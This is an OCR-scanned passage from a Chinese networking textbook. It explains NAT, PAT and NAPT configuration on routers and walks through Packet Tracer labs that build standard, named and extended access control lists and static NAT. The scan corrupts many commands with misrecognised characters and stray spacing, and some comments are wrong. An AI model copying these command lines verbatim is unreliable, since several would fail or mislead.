外 部 公有 地 址 ,为 了 同时 通信 ,对 公有 地 址 动态 配置 不 同 的 端口 号 与 多 个 内 部 私有 地 址 进 
行 映射 。 这 种 应 用 在 公有 IP 数 少时 使 用 ,这 也 是 在 路 由 器 上 应 用 最 多 的 NAT 类 型 ,也 
称 为 PAT。 例 如 ,192. 168. 1. 1 一 192. 168. 1. 254 对 应 200. 1. 1. 1:1024 一 65535 的 PAT 
转换 。 


4. 内 部 源 地 址 NAT 配置 


当 内 部 网 络 与 外 部 网 络 通信 时 ,需要 配置 NAT, 将 内 部 私有 IP 地 址 转换 成 全 局 唯一 
IP 地 址 。 可 以 配置 静态 或 动态 的 NAT 来 实现 内 部 网 络 与 外 部 网 络 的 互联 。 
在 全 局 配置 模式 下 配置 静态 NAT, 具 体 命令 格式 如 下 。 


Router(config) # ip nat inside source static local - address global - address 


// 定 义 内 部 源 地 址 静态 转换 关系 
Router(config) # interface interface- type interface- number ”// 进 入 端口 配置 模式 
Router(config - if) # ip nat inside // 定 义 该 端口 连接 内 部 网 络 
Router(config - if)#exit // 退 出 到 全 局 配置 模式 
Router(config) # interface interface 一 type interface- number  ”// 进 入 端口 配置 模式 
Router(config - if)#ip nat outside // 定 义 该 端口 连接 外 部 网 络 


在 全 局 配置 模式 下 配置 动态 NAT 的 命令 格式 如 下 。 


Router(config) # ip nat pool address - pool start - address end — address {netmask mask| 
prefix - length prefix- length} // 定 义 全 局 IP 地 址 池 
Router(config)#access— list access— list — number permit ip— address wildcard 
// 定 义 访问 控制 列表 ,只 有 匹配 该 列表 的 地 址 才 转 换 
Router(config) # ip nat inside sourcelist access— list — number pool address - pool 
// 定 义 内 部 源 地 址 动态 转换 关系 
Router (config) # interface interface — type interface — number // 进 入 端口 配置 模式 
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Router(config— if)#ip nat inside // 定 义 该 端口 连接 内 部 网 络 
Router(config- if)#exit // 退 出 到 全 局 配置 模式 
Router(config) # interface interface — type interface — number // 进 入 端口 配置 模式 
Router(config— if)#ip nat outside // 定 义 该 端口 连接 外 部 网 络 


5. 内 部 源 地 址 NAPT 


传统 的 NAT 一 般 指 一 对 一 的 地 址 映射 ,不 能 同时 满足 所 有 的 内 部 网 络 主机 与 外 部 
网 络 通信 的 需要 。 使 用 NAPT(Network Address Port Translation ,网 络 地 址 端口 转换 ) 
可 以 将 多 个 内 部 本 地 地 址 映射 到 一 个 内 部 全 局 地 址 ,路 由 器 用 内 部 全 局 地 址 和 TCP/ 
UDP 端口 号 来 对 应 。 当 进行 NAPT 转换 时 ,路 由 器 需要 维护 IP 地 址 .TCP/UDP 端口 号 
等 信息 才能 将 全 局 地 址 转换 回 内 部 本 地 地 址 。NAPT 配置 也 有 静态 和 动态 两 种 情况 , 当 
内 部 主机 需要 对 外 部 网 络 提供 服务 ,而 又 缺乏 全 局 地 址 ,或 者 没有 申请 全 局 地 址 时 ,就 可 
以 考虑 配置 静态 NAPT。 静 态 NAPT 的 内 部 全 局 地 址 可 以 是 路 由 器 外 部 端口 的 IP 地 
址 ,也 可 以 是 向 CNNIC 申请 来 的 地 址 。 而 内 部 源 地 址 动态 NAPT, 人 允许 内 部 所 有 主机 可 
以 访问 外 部 网 络 , 它 的 内 部 全 局 地 址 可 以 是 路 由 器 端口 的 IP 地 址 ,也 可 以 是 向 CNNIC 
申请 来 的 地 址 。 配 置 静态 NAPT 的 命令 格式 如 下 。 


Router(config)# ip nat inside source static {UDP|TCP} local - address port 


// 定 义 内 部 源 地 址 静态 转换 关系 
Router(config) # interface interface 一 type interface - number // 进 入 端口 配置 模式 
Router(config - if)# ip nat inside // 定 义 该 端口 连接 内 部 网 络 
Router(config) # interface interface— type interface - number // 进 入 端口 配置 模式 
Router(config — if)# ip nat outside // 定 义 该 端口 连接 外 部 网 络 


配置 动态 NAPT 的 命令 格式 如 下 。 


Router(config) # ip nat address - pool start - address end- address // 定 义 全 局 IP 地 址 池 
Router(config) # access- list access — list — number permit ip— address wildcard 

// 定 义 访问 列表 ,只 有 匹配 该 列表 的 地 址 才 转 换 
Router(config) # ip nat inside sourcelist access — list - number {[pool address - pool]| 
[interface interface - type interface - number]} overload // 定 义 内 部 源 地 址 动态 转换 关系 
Router(config) # interface interface— type interface — number // 进 入 端口 配置 模式 


Router(config— if)#ip nat inside // 定 义 该 端口 连接 内 部 网 络 
Router(config) # interface interface- type interface- number  ”// 进 入 端口 配置 模式 
Router(config - if)# ip nat outside // 定 义 该 端口 连接 外 部 网 络 


例如 ,以 下 命令 在 路 由 器 上 实现 内 部 地 址 192. 168. 1. 1 一 192. 168. 1. 254 对 应 218. 
62. 88. 87 一 218. 62. 88. 89 的 NAPT 转换 。 


Router(config) # ip nat pool guol 218. 62.88.87 218.62.88.89 netmask 255.255.255.192 
// 定 义 全 局 王 地 址 池 

Router(config) #access 一 list 1 permit 192.168.1.0 0.0.0.255 ”// 定 义 访问 列表 

Router(config) # ip nat inside source list 1 pool guol overload ”// 定 义 内 部 源 地 址 的 动态 
// 转 换 关系 

Router(config) # interface fastethernet 0/0 // 进 入 端口 配置 模式 

Router(config— if)#ip nat inside // 定 义 该 端口 连接 内 部 网 络 
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Router(config— if)#exit 

Router (config) # interface fastethernet 0/1 // 进 入 端口 配置 模式 
Router(config— if)#ip nat outside // 定 义 该 端口 连接 外 部 网 络 
6. 监视 和 维护 NAT 


当 要 清除 NAT 的 状态 以 及 NAT 转换 记录 表 时 ,可 在 特权 配置 模式 下 执行 ,具体 的 


命令 格式 如 下 。 
Router# clear ip nat statics // 进 入 全 局 配置 模式 
Router# clear ip nat translation // 清 除 NAT 所 有 转换 记录 


Router# clear ip nat translation inside global - address local - address ”// 清 除 指定 的 转换 记录 
Router# clear ip nat translation outside local - address global - address // 清 除 指定 的 转换 记录 
Router# clear ip nat translation {TCP|UDP} inside global - address port local - address port 


outside local - address global — address // 清 除 指定 转换 记录 
当 要 显示 NAT 转换 统计 状态 时 ,可 在 特权 模式 中 执行 ,具体 命令 格式 如 下 。 
Router# show ip nat statics // 显 示 NaT 统计 


Router# show ip nat translations [verbose]  ”// 显 示 NAT 转换 记录 


16.3 方案 设计 


方案 设计 如 表 16-1 所 示 。 
表 16-1 方案 设计 


任务 名 称 | 企业 网 中 三 层 网 络 设备 的 安全 设置 

。. 利用 Packet Tracer 创建 标准 IP 访问 控制 列表 

.利用 Packet Tracer 创建 命名 的 IP 访问 控制 列表 

.利用 Packet Tracer 创建 扩展 IP 访问 控制 列表 

. 利用 Packet Tracer 配置 路 由 器 的 静态 网 络 地 址 转换 

.利用 Packet Tracer 配置 路 由 器 的 动态 网 络 地 址 转换 

.利用 Packet Tracer 配置 路 由 器 的 端口 地 址 转换 

. 掌握 标准 IP 访问 控制 列表 及 扩展 IP 访问 控制 列表 的 功能 及 用 途 
. 掌握 标准 IP 访问 控制 列表 的 配置 方法 

. 掌握 扩展 IP 访问 控制 列表 的 配置 方法 

. 掌握 路 由 器 静态 网 络 地 址 转换 的 配置 方法 

. 掌握 路 由 器 动态 路 由 地 址 转换 的 配置 方法 

.掌握 路 由 器 端口 映射 的 配置 方法 

. 熟悉 访问 控制 列表 的 种 类 及 使 用 格式 

. 了 解 编号 IP 标准 访问 控制 列表 与 命名 IP 标准 访问 控制 列表 区 别 
. 了 解 NAT 的 原理 及 作用 

. 掌握 NAT 的 分 类 

. 熟悉 路 由 器 上 配置 NAT 的 步骤 





任务 分 解 





能 力 目标 





知识 目标 





下 
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续 表 
1. 树立 较 强 的 安全 意识 
2. 掌握 网 络 安全 行业 的 基本 情况 
素质 目标 | 3. 培养 吃苦 耐劳 实事求是 一丝不苟 的 工作 态度 
4. 培养 分 析 能 力 和 应 变 能 力 
5. 培养 创新 能 力 
16.4 项 目 实 施 
从 41 任务 1: 利用 Packet Tracer 创建 标准 IP 访 问 控制 列表 
1. 任务 目标 


(1) 理解 标准 IP 访问 控制 列表 的 原理 及 功能 。 
(2) 掌握 标准 IP 访问 控制 列表 的 配置 方法 。 


2. 案例 导入 


公司 的 经 理 室 、 财 务 部 和 销售 部 属于 不 同 的 3 个 网 段 ,三 部 门 之 间 用 路 由 器 进行 信息 
传递 。 为 了 安全 起 见 ,公司 要 求 销 售 部 不 能 对 财务 部 进行 访问 ,但 经 理 室 可 以 对 财务 部 进 
行 访问 。 

3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 


4. 任务 分 析 


本 任务 中 ,网 络 拓扑 图 如 图 16-1 所 示 ,PC0 代表 经 理 室 的 主机 ,PC1 代表 销售 部 的 主 
机 ,PC2 代表 财务 部 的 主机 ; IP 地 址 信息 如 表 16-2 所 示 ; 路 由 器 人 P 地 址 信息 表 如 表 16-3 
所 示 。 





a Ll GO 192.168.120 .GW 3.1 财务 部 
1P:192.168.1.10 一 50 
拓 [ms Op omersl2.1 Ns 


.255.255 
2 pr Root 122 Routers PC2 ” 网 关 :192.168.3.1 


pd 
FO, 
销售 部 司 ” 
1P:192.168.2.10 
掩 码 :255.255.255.0 妨 


网 关 :192.1682.1 PC-I 
PC 


图 16-1 任务 1 网 络 拓扑 图 
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表 16-2 任务 1 主机 IP 地址 信息 表 














主机 名 称 PC0 PC1 PC2 

IP 地 址 192. 168. 1. 10 192. 168. 2. 10 192. 168. 3. 10 
子 网 掩 码 255. 255. 255. 0 255. 255.255.0 255.255.255.0 
网 关 192. 168. 1.1 192. 168. 2. 1 192. 168. 3.1 














表 16-3 任务 1 路 由 器 IP 地址 信息 表 





Router4 Router4 Router4 Router5 Router5 


设备 名称 端口 G 0/0 端口 G 0/1 端口 G 0/2 端口 G 0/0 端口 G 0/1 





IP 地 址 192. 168. 1.1 192. 168. 2. 1 192. 168. 12. 1 192. 168. 12.2 | 192. 168. 3.1 
子 网 掩 码 255. 255. 255. 0 | 255. 255. 255. 0 | 255. 255. 255. 0 | 255.255. 255.0 | 255. 255. 255. 0 























(1) 将 3 台 主 机 与 两 台 路 由 器 之 间 均 使 用 交叉 线 相连 。 
(2) 按照 主机 IP 地 址 信息 表 配 置 3 台 主 机 的 IP 地 址 、 子 网 掩 码 和 网 关 。 
(3) 配置 路 由 器 4, 命 令 如 下 。 


Router4 > enable 

Router4 # configure terminal // 进 入 全 局 配置 模式 
Router4(config) # interface gigabitethernet 0/0 // 打 开路 由 器 G 0/0 端口 
Router4(config- if)# ip address 192.168.1.1 255.255.255.0  // 配 置 IP 地 址 
Router4(config— if)#no shutdown 

Router4(config— if) # interface gigabitethernet 0/1 

Router4(config— if)# ip address 192.168.2.1 255.255.255.0 // 配 置 IP 地 址 
Router4(config— if)#no shutdown 

Router4(config- if) # interface gigabitethernet 0/2 

Router4(config - if)# ip address 192.168.12.1 255.255.255.0 // 配 置 IP 地 址 
Router4(config— if)#no shutdown 

Router4(config— if)#exit 

Router4(config) # ip route 192.168.3.0 255.255.255.0 192.168.12.2 // 在 路 由 器 4 上 配置 静 


// 态 路 由 协议 
(4) 配置 路 由 器 5 ,命令 如 下 。 
Router5 > enable 
Router5 # configure terminal // 进 入 全 局 配置 模式 
Router5(config) # interface gigabitethernet 0/0 // 打 开路 由 器 6 0/0 端口 


Router5(config— if)# ipaddress 192.168.12.2 255.255.255.0 // 配 置 IP 地址 
Router5(config - if)no shutdown 

Router5(config - if) # interface gigabitethernet 0/1 // 打 开路 由 器 6 0/1 端口 
Router5(config— if)# ip address 192.168.3.1 255.255.255.0 // 配 置 IP 地 址 
Router5(config - if)#no shutdown 

Router5(config— if)#exit 

Router5(config) # ip route 192.168.1.0 255.255.255.0 192.168.12.1 

Router5(config) # ip route 192.168.2.0 255.255.255.0 192.168.12.1 
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// 在 路 由 器 5 上 配置 静态 路 由 ,让 3 台 PC 能 够 相互 Ping 通 , 因 为 只 有 在 互通 的 前 提 下 才 涉 及 访问 


// 控 制 列 表 

Router5(config) # end 

Router5 # show ip route // 查 看 路 由 表 

(5) 在 主机 2 上 使 用 ping 命令 ,确认 与 主机 0 和 主机 1 的 网 络 连通 性 ,3 台 主 机 能 够 
互相 Ping 通 。 


(6) 在 路 由 器 5 上 配置 编号 IP 标准 访问 控制 ,并 将 标准 IP 访问 控制 应 用 到 接口 上 。 


Router5(config) # access- list 1 deny 192.168.2.0 0.0.0.255 // 拒 绝 来 自 192.168.2.0 网 段 


// 的 数据 流量 通过 
Router5(config) #access - list 1 permit 192.168.1.0 0.0.0.255 // 允 许 来 自 192.168.1.0 网 
// 段 的 数据 流量 通过 
Router5(config) # end 
Router5# show acess 一 lists 1 // 显 示 IP 标志 访问 控制 列表 
Router5(config) # interface gigabitethernet 0/1 // 进 入 路 由 器 5 的 6G 0/1 端口 


Router5(config— if)# ipaccess— group 1 out 
Router5 (config) # end 


(7) 验证 主机 之 间 的 互通 性 ,在 命令 提示 符 下 PC0 能 够 Ping 通 主机 PC2,PC1 Ping 
不 通 PC2。 
142 任务 2: 利用 Packet Tracer 创建 命名 的 IP 访 问 控 制 列 表 

1. 任务 目标 


(1) 理解 命名 的 IP 访问 控制 列表 的 原理 及 功能 。 
(2) 掌握 命名 的 IP 访问 控制 列表 的 配置 方法 。 


2. 案例 导入 


公司 的 经 理 室 、 财 务 部 和 销售 部 属于 不 同 的 3 个 网 段 ,三 部 门 之 间 用 路 由 器 进行 信息 
传递 ,为 了 安全 起 见 , 公 司 要 求 销售 部 不 能 对 财务 部 进行 访问 ,但 经 理 室 可 以 对 财务 部 进 
行 访问 。 


3. 工作 环境 

(1) Windows 7 系统 的 主机 。 

(2) 主机 中 预 装 Packet Tracer 软件 。 
4. 任务 分 析 


本 任务 中 ,首先 对 三 层 交 换 机 进行 基本 配置 ,实现 3 个 网 段 可 以 互相 访问 ; 然后 对 交 
换 机 配置 标准 IP 访问 控制 列表 ,允许 经 理 室 发 出 的 数据 包 通 过 .不 允许 销售 部 主机 发 出 
的 数据 包 通 过 ; 最 后 将 这 一 策略 加 到 三 层 交 换 机 vlan 30 的 SVI 端口 输出 方向 。 本 任务 
的 网 络 拓扑 图 如 图 16-2 所 示 ,PC0 代表 经 理 室 的 主机 ,PC1 代表 销售 部 的 主机 ,PC2 代表 
财务 部 的 主机 ; IP 地 址 信息 如 表 16-4 所 示 。 
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网 关 :192.16821 PCL 
图 16-2 任务 2 网 络 拓扑 图 
表 16-4 任务 2 主机 IP 地 址 信息 表 
主机 名 称 PC0 PC1 PC2 
IP 地 址 192. 168. 1. 10 192. 168. 2. 10 192. 168. 3. 10 
子 网 掩 码 255. 255. 255. 0 255. 255. 255.0 255. 255. 255.0 
网 关 192. 168.1.1 192. 168. 2.1 192. 168. 3.1 
5. 实施 过 程 


(1) 3 台 主 机 与 三 层 交换 机 之 间 均 使 用 直通 线 相连 。 
(2) 按照 主机 IP 地 址 信息 表 配 置 3 台 主 机 IP 地 址 、 子 网 掩 码 和 网 关 , 如 表 16-5 
所 示 。 


表 16-5 三 层 交 换 机 端口 IP 地 址 信息 表 

















设备 名 称 Switch0 端口 F 0/0 Switch0 端口 F 0/2 Switch0 端口 F 0/3 
IP 地 址 192. 168. 1.1 192. 168. 2.1 192. 168. 3.1 
子 网 掩 码 255. 255. 255.0 255. 255. 255.0 255. 255. 255. 0 


(3) 配置 交换 机 0, 启 用 三 层 路 由 功能 ,建立 VLAN 并 分 配 端口 及 IP 地 址 ,命令 
如 下 。 


Switch0 > enable 


Switch0 # configure terminal // 进 入 全 局 配置 模式 
Switch0(config) # ip routing // 启 用 三 层 交 换 机 路 由 功能 
Switch0(config) # vlan 10 // 建 立 VLAN 


Switch0(config- vlan) # ex 让 

Switch0(config) # vlan 20 

Switch0(config - vlan) # exit 

Switch0(config) # vlan 30 

Switch0(config - vlan) # ex 让 

Switch0(config) # interface fastethernet 0/1 
Switch0(config - if)# switchport mode access 
Switcho(config - 证 ) 间 switcbhport access vlan 10 
switch0(config 一 过) 间 exit 

Switch0(config) # interface fastethernet 0/2 
Switch0(config — 证 ) # switchiport aode access 
SwitchO (config— if) # switchport access vlan 20 
Switch0(config - if)#exit 
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Switch0(config) # interface fastethernet 0/3 

Switch0(config - if)# switchport mode access 

Switch0(config- if)# switchport access vlan 30 

Switch0(config- if)#exit 

Switch0(config) # interface vlan 10 

Switch0(config- 证 ) # ip address 192.168.1.1 255.255.255.0  // 分 配 IP 地 址 

Switch0(config- if)#no shutdown 

SwitchO(config— if)#exit 

Switch0(config) # interface vlan 20 

Switch0(config- if)# ip address 192.168.2.1 255.255.255.0 

Switch0(config - if)#no shutdown 

Switch0(config - if)#exit 

Switch0(config) # interface vlan 30 

Switch0(config- if)# ip address 192.168.3.1 255.255.255.0 

Switch0(config- if)#no shutdown 

Switch0(config— if)#end 

Switch0#show ip route // 查 看 三 层 交 换 机 路 由 表 , 可 以 看 到 3 条 直 连 路 由 

(4) 验证 3 台 主 机 之 间 的 连通 性 ,正常 情况 下 PC0 和 PC1 均 能 够 Ping 通 主 机 PC2。 
如 果 PC0 或 PC1 使 用 ipconfig 命令 和 ping 命令 的 结果 不 正确 , 则 需要 重启 。 如 果 PC0 
和 PC1 均 不 能 Ping 通 主机 PC2, 则 一 方面 检查 三 层 交 换 机 是 否 开启 路 由 功能 , 另 一 方面 
查看 三 层 交 换 机 的 VLAN 建立 是 否 正确 ,分 配 端口 及 IP 地 址 是 否 正确 。 

(5) 配置 交换 机 0 的 命名 的 标准 IP 访问 控制 列表 的 配置 ,命令 如 下 。 

Switch0 # configure terminal // 进 入 的 全 局 配置 模式 

Switch0(config) # ip access 一 list standard guol // 命 名 的 标准 IP 访问 控制 列表 的 配置 

Switch0(config- std— nacl)# permit 192.168.1.0 0.0.0.255 

Switch0(config- std— nacl)#exit 

Switch0(config) # interface vlan 30 

Switch0(config- if)# ip access - group guol out 

Switch0(config- if)#end 

(6) 验证 主机 之 间 的 互通 性 ,正常 情况 下 PC0 能 够 Ping 通 主机 PC2,PC] 不 能 Ping 
通 PC2。 


怕 43 任务 3: 利用 Packet Tracer 创建 扩展 IP 访问 控制 列表 
1. 任务 目标 


(1) 理解 扩展 IP 访问 控制 列表 的 原理 及 功能 。 
(2) 掌握 扩展 IP 访问 控制 列表 的 配置 方法 。 


2. 案例 导入 


公司 的 信息 中 心 分 别 架设 了 FTP 服务 器 和 Web 服务 器 ,其 中 FTP 服务 器 供 经 理 室 
专用 ,销售 部 不 可 用 ,而 Web 服务 器 经 理 室 和 销售 部 都 可 以 使 用 ,FTP 服务 器 和 Web 服 
务 器 .经理 室 、 销 售 部 属于 不 同 的 3 个 网 段 ,三 部 门 之 间 用 路 由 器 进行 信息 传递 ,要 求 对 路 
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由 器 进行 设置 实现 网 络 的 数据 流量 控制 。 
3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 


4. 任务 分 析 


本 任务 中 ,首先 需要 对 两 个 路 由 器 进行 基本 配置 ,实现 3 个 网 段 能 够 互相 访问 ; 然后 
对 距离 控制 源 距离 较 近 的 路 由 器 配置 扩展 IP 访问 控制 列表 ,不 允许 销售 部 主机 发 送 的 
FTP 数据 包 通 过 ,允许 经 理 室 主机 发 出 的 数据 包 通 过 ; 最 后 将 这 一 策略 添加 到 路 由 器 端 
口 , 网 络 拓扑 如 图 16-3 所 示 ,PC0 代表 经 理 室 的 主机 ,PC1 代表 销售 部 的 主机 ,Server0 代 
表 FTP 服务 器 ,Serverl 代表 Web 服务 器 ; IP 地 址 信息 如 表 16-6 所 示 。 
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图 16-3 扩展 IP 访问 控制 列表 网 络 拓扑 图 
表 16-6 任务 3 主机 及 服务 器 IP 地 址 信息 表 

主机 名 称 了 PC0 PC1 Server0 Serverl 
IP 地 址 192. 168. 1. 10 192. 168. 2. 10 192. 168. 3. 10 192. 168. 3. 11 
子 网 掩 码 255. 255. 255. 0 255. 255. 255.0 255. 255. 255.0 255. 255. 255. 0 
网 关 192. 168. 1.1 192. 168. 2. 1 192. 168. 3. 1 192. 168. 3. 1 
5. 实施 过 程 


(1) 主机 PC0 和 PC1 与 路 由 器 之 间 均 使 用 交叉 线 相连 ,服务 器 Server0 和 Serverl 
与 交换 机 之 间 用 直通 线 相连 ,路 由 器 与 交换 机 之 间 用 交叉 线 相连 。 
(2) 按照 主机 及 服务 器 IP 地址 信息 表 配 置 2 台 主 机 和 2 台 服 务 器 的 IP 地 址 、 子 网 掩 
码 和 网 关 , 如 表 16-7 所 示 。 
表 16-7 任务 3 路 由 器 端口 IP 地址 信息 表 





Router0 端口 Router0 端口 Router0 端口 Routerl 端口 Routerl 端口 


i F 0/0 F 0/1 S0/3/0 S 0/3/0 F0/0 





IP 地 址 192.168.1.1 192. 168.2.1 192.168.12.1 |192.168.12.2 |192.168.3.1 
子 网 掩 码 | 255. 255. 255. 0 | 255. 255. 255. 0 |255.255.255.0 | 255. 255. 255. 0 |255.255.255.0 
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(3) 配置 路 由 器 Router0 ,命令 如 下 。 





Router0 > enable 

Router0# configure terminal // 进 入 全 局 配置 模式 
Router0(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 
Router0(config i) 上 # ip address 192.168.1.1 255.255.255.0  // 配 置 IP 地址 
Router0(config— if)#no shutdown 

Router0(config— if) # interface fastethernet 0/1 // 打 开路 由 器 F 0/1 端口 
Router0(config- if)# ip address 192.168.2.1 255.255.255.0 // 配 置 IP 地 址 
Router0(config— if)#no shutdown 

Router0(config— if)# interface serial 0/3/0 

Router0(config— if)#ipaddress 192.168.12.1 255.255.255.0 // 配 置 IP 地址 
Router0(config— if)#clock rate 64000 

Router0(config— if)#no shutdown 

Router0(config— if)#exit 

Router0(config) # ip route 192.168.3.0 255.255.255.0 192.168.12.2 // 在 路 由 器 0 上 配置 静 


// 态 路 由 

Router0(config) # exit 
Router0# show ip route // 检 查 路 由 表 , 可 以 看 到 路 由 表 

// 内 既 有 直 连 路 由 也 有 静态 路 由 
(4) 配置 路 由 器 Routerl ,命令 如 下 。 
Routerl > enable 
Routerl # configure terminal // 进 入 全 局 配置 模式 
Routerl(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 


Routerl(config- if)# ip address 192.168.3.1 255.255.255.0  // 配 置 IP 地 址 

Routerl(config— if)#no shutdown 

Routerl(config— if) # interface serial 0/3/0 

Routerl(config - if)# ip address 192.168.12.2 255.255.255.0 // 配 置 IP 地址 

Routerl(config— if)#clock rate 64000 

Routerl(config — if)#no shutdown 

Routerl(config— if)#exit 

Routerl(config) # ip route 192.168.1.0 255.255.255.0 192.168.12.1 // 在 路 由 器 1 上 配置 静 
// 态 路 由 协议 

Routerl(config) # ip route 192.168.2.0 255.255.255.0 192.168.12.1 

Router1l(config) # exit 


Routerl 上 show ip route // 检 查 路 由 表 , 可 以 看 到 路 由 表 内 既 有 直 连 路 由 也 有 静态 路 由 


(5) 验证 2 台 主 机 与 2 台 服 务 器 之 间 的 网 络 连 通 性 ,PC0 和 PC1 均 能 够 Ping 通 2 台 
服务 器 ,可 以 登录 FTP 服务 器 ,在 命令 提示 符 窗 口 输入 ftp 192. 168. 3. 10, 用 户 名 为 
cisco, 密 码 为 cisco, 显 示 登 录 成 功 。 也 可 以 打开 Web 浏览 器 ,输入 http://192. 168. 3. 11 


进行 验证 。 

(6) 在 Router0 上 配置 扩展 IP 访问 控制 列表 ,并 将 扩展 IP 访问 控制 列表 应 用 到 端口 
上 ,命令 如 下 。 

Router0 > enable 

Router0# configure terminal // 进 入 全 局 配置 模式 


Router0(config) #access— list 101 deny tcp 192.168.2.0 0.0.0.255 192.168.3.0 0.0.0.255 eq 
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ftp // 拒 绝 来 自 192.168.2.0 网 段 去 往 192.168.3.0 网 段 的 FTP 流量 经 过 


Router0(config) #access — list 101 permit ip any any // 人 允许 其 他 流量 经 过 
Router0(config) # interface fastethernet 0/1 
Router0(config- if)# ip access - group 101 in // 应 用 扩展 琵 访问 控制 列表 


(7) 验证 配置 ,在 经 理 室 PC0 的 命令 提示 符 下 使 用 ftp 命令 ,用 户 名 为 cisco, 密 码 为 
cisco, 可 以 登录 FTP 服务 器 192. 168. 3. 10。 在 销售 部 PC1 的 命令 提示 符 下 输入 ftp 192. 
168. 3. 10 却 登录 失败 ,但 在 PCO 和 PC1 均 能 够 进行 Web 浏览 ( http://192. 168. 3. 11)。 


怕 44 任务 4: 利用 Packet Tacer 配 置 路 由 器 的 静态 网 络 地 址 转换 
1. 任务 目标 


(1) 理解 静态 网 络 地 址 转换 的 原理 及 功能 。 
(2) 掌握 静态 NAT 的 配置 ,实现 企业 服务 器 能 够 对 外 提供 服务 。 


2. 案例 导入 


公司 的 出 口 路 由 器 通过 串口 连接 到 电信 运营 商 ,电信 运营 商 给 企业 出 口 路 由 器 分 配 的 
人 地址 是 201. 201. 201. 1/24, 分 配给 企业 用 于 地 址 翻译 的 地 址 段 是 210. 210. 210. 0/24, 现 
在 需要 做 合理 配置 ,使 公司 的 Web 和 BBS 2 台 服 务 器 能 够 对 外 提供 服务 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 


4. 任务 分 析 


根据 公司 的 需要 ,公司 内 部 的 Web 和 BBS 2 台 服 务 器 需要 有 固定 且 合法 的 IP 地 址 ， 
才能 对 外 提供 服务 ,所 以 应 该 采用 静态 NAT 方式 ,网 络 拓扑 图 如 图 16-4 所 示 ,PCO0 代表 
外 网 主机 ,Server0 代表 Web 服务 器 ,Serverl 代表 BBS 服务 器 ,Server2 代表 DNS 服务 
器 ,主机 与 服务 器 IP 地 址 信息 如 表 16-8 所 示 , 路 由 器 端口 IP 地 址 信息 如 表 16-9 所 示 。 
公司 内 部 的 Web 服务 器 和 BBS 服务 器 为 私有 IP 地 址 ,它们 是 192. 168. 1. 2/24 和 
192. 168. 1. 3/24。 从 ISP 分 配给 公司 的 用 于 NAT 的 地 址 段 中 拿 出 2 个 网 段 210. 210. 
210. 1/24 和 210. 210. 210. 2/24 ,分 别 用 于 Web 和 BBS 2 台 服 务 器 对 外 服务 地 址 , Web 
和 BBS 服务 器 的 域名 分 别 是 www. sdpt. com. cn 和 bbs. sdpt. com. cn。 


表 16-8 任务 4 主机 与 服务 器 IP 地 址 信息 表 


























设备 名 称 PC0 Server0 Serverl Server2 

IP 地 址 200. 200. 200.2 192. 168.1.2 192. 168. 1.3 199. 199. 199. 2 
子 网 掩 码 255. 255. 255. 0 255. 255. 255. 0 255. 255. 255. 0 255. 255. 255. 0 
网 关 200. 200. 200.1 192. 168. 1.1 192. 168. 1. 1 199. 199. 199. 1 
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表 16-9 任务 4 路 由 器 端口 IP 地 址 信息 表 























设备 名 称 Router0 端口 F 0/0 | Router0 端口 S 0/0 | Router2 端口 S 0/0 | Router2 端口 S 0/1 
IP 地 址 192. 168.1.1 201. 201. 201.1 201. 201. 201.2 202. 202. 202. 1 
子 网 掩 码 255. 255. 255.0 255. 255. 255. 0 255. 255. 255. 0 255. 255.255.0 
设备 名 称 Router2 端口 F 0/0 | Router3 端口 S 0/0 | Router3 端口 F 0/0 

IP 地 址 199. 199. 199.1 202. 202. 202. 2 200. 200. 200.1 

子 网 掩 码 255. 255. 255. 0 255. 255. 255. 0 255. 255. 255. 0 
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图 16-4 任务 4 网 络 拓扑 图 


IP:192.168.1.3/24 
网 关 :192.168.1.1 


Web 
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网 关 :192.168.1.1 


5. 实施 过 程 


(1) 主机 与 路 由 器 之 间 使 用 交叉 线 相连 ,Server0 和 Serverl 与 交换 机 用 直通 线 相连 ， 
Server2 与 路 由 器 用 交叉 线 相连 ,交换 机 与 路 由 器 之 间 用 交叉 线 相 连 , 路 由 器 与 路 由 器 之 
间 用 串口 线 相连 。 

(2) 按照 主机 与 服务 器 的 IP 地 址 信息 表 配 置 主机 和 3 台 服 务 器 的 IP 地 址 . 子 网 掩 
码 和 网 关 。 注 意 主机 还 需要 配置 DNS 服务 器 ,地 址 为 199. 199. 199. 2, 如 图 16-5 所 示 。 




















P Configurat [x] 
IP Configuration 

O DHcp ® static 

IP Address 200.200.200.2 

Subnet Mask 255.255.255.0 

Default Gateway |[200.200.200.1 

DNS Server 199.199.199.2 














图 16-5 PC0 的 IP 地 址 配置 


(3) 配置 Web 服务 器 和 BBS 服务 器 的 IP 地 址 . 子 网 掩 码 和 网 关 后 ,还 需要 修改 Web 
和 BBS 页 面 显示 内 容 , 如 图 16-6 所 示 。 


(4) 配置 DNS 服务 器 时 要 关闭 HTTP, 减 少 出 错 概率 ,同时 添加 主机 记录 ,如 图 16-7 
所 示 。 


(5) 配置 路 由 器 0, 命 令 如 下 。 
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图 16-6 服务 器 的 页 面 显示 内 容 配置 
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图 16-7 添加 DNS 主机 记录 


Router0 > enable 
Router0# configure terminal // 进 入 全 局 配置 模式 
Router0(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 


Router0(config- if)# ip address 192.168.1.1 255.255.255.0  // 配 置 端口 IP 地 址 
Router0(config - if)#no shutdown 

Router0(config - if)# interface serial 0/0 // 打 开路 由 器 S 0/0 端口 
Router0(config- 证 ) # ip address 201.201.201.1 255.255.255.0 ”// 配 置 端口 IP 地址 
Router0(config - if)#no shutdown 

Router0(config— if)#exit 

Router0(config) # ip route 0.0.0.0 0.0.0.0 201.201.201.2 // 配 置 默认 路 由 


(6) 配置 路 由 器 2, 命 令 如 下 。 
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Router2 > enable 
Router2# configure terminal // 进 入 全 局 配置 模式 
Router2(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 
Router2(config 证 ) # ip address 199.199.199.1 255.255.255.0 ” // 配 置 端口 IP 地址 
Router2(config - if)#no shutdown 
Router2(config- if)# interface serial 0/0 // 打 开路 由 器 S 0/0 端口 
Router2(config if) # ip address 201.201.201.2 255.255.255.0 ”// 配 置 IP 地 址 
Router2(config - if)no shutdown 
